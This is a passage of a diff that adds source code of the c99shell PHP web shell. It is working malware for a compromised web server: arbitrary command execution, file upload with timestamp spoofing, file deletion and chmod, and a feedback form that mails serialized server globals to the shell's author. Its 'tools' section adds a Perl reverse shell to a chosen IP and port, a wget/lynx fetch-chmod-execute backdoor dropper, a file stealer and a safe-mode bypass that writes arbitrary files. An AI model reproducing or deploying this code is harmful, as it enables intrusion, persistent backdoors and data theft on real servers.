+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
+    { 
+     if ($filestealth) {$stat = stat($uploadpath.$destin);} 
+     $fp = fopen($uploadpath.$destin,"w"); 
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
+     else 
+     { 
+      fwrite($fp,$content,strlen($content)); 
+      fclose($fp); 
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
+     } 
+    } 
+   } 
+  } 
+ } 
+ if ($miniform) 
+ { 
+  echo "<b>".$uploadmess."</b>"; 
+  $act = "ls"; 
+ } 
+ else 
+ { 
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
+File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
+<input type=submit name=submit value=\"Upload\"> 
+</form>"; 
+ } 
+} 
+if ($act == "delete") 
+{ 
+ $delerr = ""; 
+ foreach ($actbox as $v) 
+ { 
+  $result = FALSE; 
+  $result = fs_rmobj($v); 
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
+ } 
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
+ $act = "ls"; 
+} 
+if (!$usefsbuff) 
+{ 
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
+} 
+else 
+{ 
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actarcbuff) 
+ { 
+  $arcerr = ""; 
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
+  else {$ext = ".tar.gz";} 
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
+  $cmdline .= " ".$actarcbuff_path; 
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
+  foreach($objects as $v) 
+  { 
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Error_Log SAfe Mode Bypass By Adora </b>
+      <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
